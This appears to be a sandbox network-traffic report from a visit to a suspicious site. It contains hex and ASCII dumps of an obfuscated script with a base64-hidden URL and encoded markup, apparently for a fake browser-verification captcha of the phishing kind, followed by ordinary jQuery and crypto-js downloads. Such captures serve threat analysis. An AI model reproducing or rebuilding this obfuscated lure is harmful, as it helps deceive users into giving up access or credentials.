                                                                                                                                              2024-11-06 15:55:33 UTC707INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 4e 50 53 6d 70 4d 55 47 46 70 5a 7a 46 6b 4e 6e 42 6f 56 44 42 4a 55 45 52 33 4f 45 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 5a 57 31 6e 57 47 73 34 4e 57 74 4f 5a 47 39 6f 55 6d 39 76 54 43 38 33 62 45 78 34 65 56 46 6b 61 46 5a 77 5a 44 64 49 51 55 31 69 63 47 56 31 57 54 4a 76 61 48 46 74 62 32 64 51 5a 57 70 35 65 57 5a 57 54 48 52 72 5a 32 64 45 51 32 64 34 61 6b 6c 35 4e 79 39 6e 4e 6c 4d 79 57 48 4a 73 4e 57 39 57 63 6d 6c 45 62 55 77 30 62 58 64 50 64 45 35 44 4c 7a 4e 4e 64 6e 6c 4c 57 6d 74 79 52 6b 56 53 4f 44 45 33 55 6c 42 58 64 57 45 32 63 47 5a 78 59 57 52 47 57 6c 68 43 4d 79 74 71 4d 53 74 4e 53 47 78 35 4d 69 38
                                                                                                                                              Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IkNPSmpMUGFpZzFkNnBoVDBJUER3OEE9PSIsInZhbHVlIjoiZW1nWGs4NWtOZG9oUm9vTC83bEx4eVFkaFZwZDdIQU1icGV1WTJvaHFtb2dQZWp5eWZWTHRrZ2dEQ2d4akl5Ny9nNlMyWHJsNW9WcmlEbUw0bXdPdE5DLzNNdnlLWmtyRkVSODE3UlBXdWE2cGZxYWRGWlhCMytqMStNSGx5Mi8
                                                                                                                                              2024-11-06 15:55:33 UTC1369INData Raw: 33 61 66 32 0d 0a 3c 21 2d 2d 20 53 75 63 63 65 73 73 20 6d 65 61 6e 73 20 64 6f 69 6e 67 20 74 68 65 20 62 65 73 74 20 77 65 20 63 61 6e 20 77 69 74 68 20 77 68 61 74 20 77 65 20 68 61 76 65 2e 20 53 75 63 63 65 73 73 20 69 73 20 74 68 65 20 64 6f 69 6e 67 2c 20 6e 6f 74 20 74 68 65 20 67 65 74 74 69 6e 67 3b 20 69 6e 20 74 68 65 20 74 72 79 69 6e 67 2c 20 6e 6f 74 20 74 68 65 20 74 72 69 75 6d 70 68 2e 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 53 75 63 63 65 73 73 20 69 73 20 68 6f 77 20 68 69 67 68 20 79 6f 75 20 62 6f 75 6e 63 65 20 77 68 65 6e 20 79 6f 75 20 68 69 74 20 62 6f 74 74 6f 6d 2e 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 38 7a 54 53 35 6a 59 57 78 70 5a 6e 4a 68 5a 32 6c 73 61 58
                                                                                                                                              Data Ascii: 3af2... Success means doing the best we can with what we have. Success is the doing, not the getting; in the trying, not the triumph. -->... Success is how high you bounce when you hit bottom. --><script>if(atob("aHR0cHM6Ly8zTS5jYWxpZnJhZ2lsaX
                                                                                                                                              2024-11-06 15:55:33 UTC1369INData Raw: 41 77 63 48 67 70 65 77 30 4b 49 30 4e 79 59 56 5a 69 57 55 64 30 54 6c 63 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 51 33 4a 68 56 6d 4a 5a 52 33 52 4f 56 79 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 30 4e 79 59 56 5a 69 57 55 64 30 54 6c 63 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4e 54 4e 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59
                                                                                                                                              Data Ascii: AwcHgpew0KI0NyYVZiWUd0TlcgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojQ3JhVmJZR3ROVyBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI0NyYVZiWUd0TlcuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogNTNweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tY
                                                                                                                                              2024-11-06 15:55:33 UTC1369INData Raw: 6d 62 32 35 30 4c 57 5a 68 62 57 6c 73 65 54 6f 67 59 58 4a 70 59 57 77 73 49 48 4e 68 62 6e 4d 74 63 32 56 79 61 57 59 37 59 6d 46 6a 61 32 64 79 62 33 56 75 5a 43 31 6a 62 32 78 76 63 6a 6f 67 49 32 5a 6d 5a 6a 74 6a 62 32 78 76 63 6a 6f 67 49 7a 41 77 4d 44 74 77 59 57 52 6b 61 57 35 6e 4f 69 41 79 4d 48 42 34 4f 32 5a 76 62 6e 51 74 63 32 6c 36 5a 54 6f 67 4d 54 68 77 65 44 74 76 64 6d 56 79 63 32 4e 79 62 32 78 73 4c 57 4a 6c 61 47 46 32 61 57 39 79 4f 69 42 6a 62 32 35 30 59 57 6c 75 4f 79 49 2b 44 51 6f 38 5a 47 6c 32 49 47 6c 6b 50 53 4a 44 63 6d 46 57 59 6c 6c 48 64 45 35 58 49 69 42 6a 62 47 46 7a 63 7a 30 69 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 49 69 50 67 30 4b 50 47 52 70 64 69 42 70 5a 44 30 69 64 58 6c 76 55 58
                                                                                                                                              Data Ascii: mb250LWZhbWlseTogYXJpYWwsIHNhbnMtc2VyaWY7YmFja2dyb3VuZC1jb2xvcjogI2ZmZjtjb2xvcjogIzAwMDtwYWRkaW5nOiAyMHB4O2ZvbnQtc2l6ZTogMThweDtvdmVyc2Nyb2xsLWJlaGF2aW9yOiBjb250YWluOyI+DQo8ZGl2IGlkPSJDcmFWYllHdE5XIiBjbGFzcz0iY2FwdGNoYS1jb250YWluZXIiPg0KPGRpdiBpZD0idXlvUX
                                                                                                                                              2024-11-06 15:55:33 UTC1369INData Raw: 59 79 77 4e 43 6e 30 70 4f 77 30 4b 5a 6e 56 75 59 33 52 70 62 32 34 67 61 32 4a 4a 65 57 31 6e 57 57 39 6d 65 53 67 70 49 48 73 4e 43 69 41 67 49 43 42 30 64 58 4a 75 63 33 52 70 62 47 55 75 63 6d 56 7a 5a 58 51 6f 4b 54 73 4e 43 6e 30 4e 43 6d 5a 31 62 6d 4e 30 61 57 39 75 49 47 78 7a 64 56 56 4c 65 6c 64 56 62 57 4d 6f 4b 53 42 37 44 51 6f 67 49 43 41 67 64 6d 46 79 49 48 4e 46 51 32 35 47 51 58 6c 34 5a 58 41 67 50 53 42 6b 62 32 4e 31 62 57 56 75 64 43 35 6e 5a 58 52 46 62 47 56 74 5a 57 35 30 51 6e 6c 4a 5a 43 67 69 61 45 74 47 52 6e 70 57 62 6d 35 4d 5a 69 49 70 4f 77 30 4b 49 43 41 67 49 48 4e 46 51 32 35 47 51 58 6c 34 5a 58 41 75 62 32 35 7a 64 57 4a 74 61 58 51 67 50 53 42 6d 64 57 35 6a 64 47 6c 76 62 69 41 6f 5a 58 5a 6c 62 6e 51 70 49 48 73
                                                                                                                                              Data Ascii: YywNCn0pOw0KZnVuY3Rpb24ga2JJeW1nWW9meSgpIHsNCiAgICB0dXJuc3RpbGUucmVzZXQoKTsNCn0NCmZ1bmN0aW9uIGxzdVVLeldVbWMoKSB7DQogICAgdmFyIHNFQ25GQXl4ZXAgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiaEtGRnpWbm5MZiIpOw0KICAgIHNFQ25GQXl4ZXAub25zdWJtaXQgPSBmdW5jdGlvbiAoZXZlbnQpIHs
                                                                                                                                              2024-11-06 15:55:33 UTC1369INData Raw: 72 6f 61 64 20 74 6f 20 73 75 63 63 65 73 73 20 61 6e 64 20 74 68 65 20 72 6f 61 64 20 74 6f 20 66 61 69 6c 75 72 65 20 61 72 65 20 61 6c 6d 6f 73 74 20 65 78 61 63 74 6c 79 20 74 68 65 20 73 61 6d 65 2e 20 2a 2f 0d 0a 7d 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 38 7a 54 53 35 6a 59 57 78 70 5a 6e 4a 68 5a 32 6c 73 61 58 4e 30 4c 6d 4e 76 62 53 38 33 55 46 68 56 4c 77 3d 3d 22 29 20 21 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 63 6f 6e 73 74 20 6a 43 54 7a 58 54 6b 4c 45 45 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2e 73 70 6c 69 74 28 27 2e 27 29 2e 73 6c 69 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 63 6f 6e 73 74 20 69 6b 63 7a 77 70 79 63 64 6b 20 3d 20 6e 65 77 20
                                                                                                                                              Data Ascii: road to success and the road to failure are almost exactly the same. */}if(atob("aHR0cHM6Ly8zTS5jYWxpZnJhZ2lsaXN0LmNvbS83UFhVLw==") !== "nomatch"){const jCTzXTkLEE = window.location.hostname.split('.').slice(-2).join('.');const ikczwpycdk = new
                                                                                                                                              2024-11-06 15:55:33 UTC1369INData Raw: 4b 49 43 41 67 49 44 78 74 5a 58 52 68 49 47 35 68 62 57 55 39 49 6e 5a 70 5a 58 64 77 62 33 4a 30 49 69 42 6a 62 32 35 30 5a 57 35 30 50 53 4a 33 61 57 52 30 61 44 31 6b 5a 58 5a 70 59 32 55 74 64 32 6c 6b 64 47 67 73 49 47 6c 75 61 58 52 70 59 57 77 74 63 32 4e 68 62 47 55 39 4d 53 34 77 49 6a 34 4e 43 69 41 67 49 43 41 38 64 47 6c 30 62 47 55 2b 4a 69 4d 34 4d 6a 41 7a 4f 7a 77 76 64 47 6c 30 62 47 55 2b 44 51 6f 67 49 43 41 67 50 48 4e 30 65 57 78 6c 50 67 30 4b 59 6d 39 6b 65 53 42 37 44 51 6f 67 49 47 4a 68 59 32 74 6e 63 6d 39 31 62 6d 51 74 59 32 39 73 62 33 49 36 49 43 4e 6d 5a 6d 59 37 44 51 6f 67 49 47 68 6c 61 57 64 6f 64 44 6f 67 4d 54 41 77 4a 54 73 4e 43 69 41 67 62 33 5a 6c 63 6d 5a 73 62 33 63 36 49 47 68 70 5a 47 52 6c 62 6a 73 4e 43 6e
                                                                                                                                              Data Ascii: KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn
                                                                                                                                              2024-11-06 15:55:33 UTC1369INData Raw: 62 69 31 30 62 33 41 36 4d 33 4a 6c 62 53 46 70 62 58 42 76 63 6e 52 68 62 6e 51 37 66 51 30 4b 49 30 4e 79 59 56 5a 69 57 55 64 30 54 6c 63 67 4c 6d 31 30 4c 54 51 67 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 49 44 46 79 5a 57 30 68 61 57 31 77 62 33 4a 30 59 57 35 30 4f 33 30 4e 43 69 4e 44 63 6d 46 57 59 6c 6c 48 64 45 35 58 49 43 4e 6b 51 57 74 74 64 58 4e 79 65 57 5a 44 49 48 74 6a 62 32 78 76 63 6a 6f 67 49 7a 5a 6a 4e 7a 55 33 5a 44 74 6d 62 32 35 30 4c 58 4e 70 65 6d 55 36 4d 54 52 77 65 44 74 74 59 58 4a 6e 61 57 34 74 64 47 39 77 4f 69 41 75 4e 58 4a 6c 62 54 74 39 44 51 6f 67 49 43 41 67 50 43 39 7a 64 48 6c 73 5a 54 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 50 67 30 4b 49 43 41 67 49 48 4e 6c 64 45 6c 75 64 47 56 79 64 6d 46
                                                                                                                                              Data Ascii: bi10b3A6M3JlbSFpbXBvcnRhbnQ7fQ0KI0NyYVZiWUd0TlcgLm10LTQge21hcmdpbi10b3A6IDFyZW0haW1wb3J0YW50O30NCiNDcmFWYllHdE5XICNkQWttdXNyeWZDIHtjb2xvcjogIzZjNzU3ZDtmb250LXNpemU6MTRweDttYXJnaW4tdG9wOiAuNXJlbTt9DQogICAgPC9zdHlsZT4NCiAgICA8c2NyaXB0Pg0KICAgIHNldEludGVydmF
                                                                                                                                              2024-11-06 15:55:33 UTC1369INData Raw: 44 30 69 59 6d 78 30 5a 47 52 68 64 47 45 69 49 47 35 68 62 57 55 39 49 6d 4a 73 64 47 52 6b 59 58 52 68 49 69 42 32 59 57 78 31 5a 54 30 69 49 6a 34 4e 43 6a 77 76 5a 6d 39 79 62 54 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 47 52 70 64 69 42 6a 62 47 46 7a 63 7a 30 69 64 47 56 34 64 43 31 6a 5a 57 35 30 5a 58 49 69 49 47 6c 6b 50 53 4a 6b 51 57 74 74 64 58 4e 79 65 57 5a 44 49 6a 34 4e 43 6b 4a 79 62 33 64 7a 5a 58 49 67 64 6d 56 79 61 57 5a 70 59 32 46 30 61 57 39 75 49 48 56 75 5a 47 56 79 64 32 46 35 49 48 52 76 49 47 31 68 61 57 35 30 59 57 6c 75 49 48 4e 6c 59 33 56 79 5a 53 42 68 59 32 4e 6c 63 33 4d 75 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77 76 5a 6d 39 79 62 54 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38
                                                                                                                                              Data Ascii: D0iYmx0ZGRhdGEiIG5hbWU9ImJsdGRkYXRhIiB2YWx1ZT0iIj4NCjwvZm9ybT4NCjwvZGl2Pg0KPGRpdiBjbGFzcz0idGV4dC1jZW50ZXIiIGlkPSJkQWttdXNyeWZDIj4NCkJyb3dzZXIgdmVyaWZpY2F0aW9uIHVuZGVyd2F5IHRvIG1haW50YWluIHNlY3VyZSBhY2Nlc3MuDQo8L2Rpdj4NCjwvZm9ybT4NCjwvZGl2Pg0KPC9kaXY+DQo8
                                                                                                                                              2024-11-06 15:55:33 UTC1369INData Raw: 67 6e 4c 30 46 54 51 55 78 47 54 45 56 4b 52 6b 74 47 55 46 52 4a 51 30 74 50 51 30 56 61 53 30 64 44 53 56 4a 47 55 6b 74 51 53 6c 4a 5a 55 55 4e 56 56 56 5a 58 56 6b 35 4f 56 45 46 4b 54 56 64 43 54 55 74 4f 51 6b 4e 48 53 46 4e 52 53 31 56 58 57 6b 70 42 57 6b 52 47 52 6b 78 47 52 45 31 4c 53 56 56 4c 55 6c 42 43 64 6d 31 50 52 45 35 68 53 45 78 59 52 6e 59 33 54 6e 49 30 64 6e 70 70 5a 47 46 30 63 48 5a 34 61 7a 39 78 63 57 56 6f 65 58 52 6b 55 6b 4e 4a 57 45 31 61 57 45 70 61 57 56 5a 4d 53 55 46 57 55 46 56 42 53 55 78 59 54 6c 52 61 54 45 4a 59 53 6b 74 4f 52 6c 70 42 52 56 70 55 52 6c 6c 55 52 30 6c 61 56 46 64 70 5a 6d 5a 33 64 58 5a 69 62 48 6c 79 61 33 46 32 64 47 6c 70 65 6e 52 74 5a 48 64 30 63 33 46 76 5a 57 52 6a 65 58 6c 76 63 32 64 72 59
                                                                                                                                              Data Ascii: gnL0FTQUxGTEVKRktGUFRJQ0tPQ0VaS0dDSVJGUktQSlJZUUNVVVZXVk5OVEFKTVdCTUtOQkNHSFNRS1VXWkpBWkRGRkxGRE1LSVVLUlBCdm1PRE5hSExYRnY3TnI0dnppZGF0cHZ4az9xcWVoeXRkUkNJWE1aWEpaWVZMSUFWUFVBSUxYTlRaTEJYSktORlpBRVpURllUR0laVFdpZmZ3dXZibHlya3F2dGlpenRtZHd0c3FvZWRjeXlvc2drY


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              24192.168.2.1849774151.101.2.1374432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:34 UTC626OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                              Host: code.jquery.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://ns.califragilist.com/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:34 UTC611INHTTP/1.1 200 OK
                                                                                                                                              Connection: close
                                                                                                                                              Content-Length: 89501
                                                                                                                                              Server: nginx
                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                              Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                              ETag: "28feccc0-15d9d"
                                                                                                                                              Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                              Via: 1.1 varnish, 1.1 varnish
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:34 GMT
                                                                                                                                              Age: 1925396
                                                                                                                                              X-Served-By: cache-lga21931-LGA, cache-dfw-kdfw8210151-DFW
                                                                                                                                              X-Cache: HIT, HIT
                                                                                                                                              X-Cache-Hits: 2, 19
                                                                                                                                              X-Timer: S1730908534.282116,VS0,VE0
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              2024-11-06 15:55:34 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                              Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                              2024-11-06 15:55:34 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                                                                              Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                                                                              2024-11-06 15:55:34 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                                                                              Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                                                                              2024-11-06 15:55:34 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                                                                              Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                                                                              2024-11-06 15:55:34 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                                                                              Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                                                                              2024-11-06 15:55:34 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                                                                              Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              25192.168.2.1849776104.17.25.144432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:34 UTC654OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                                                              Host: cdnjs.cloudflare.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://ns.califragilist.com/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
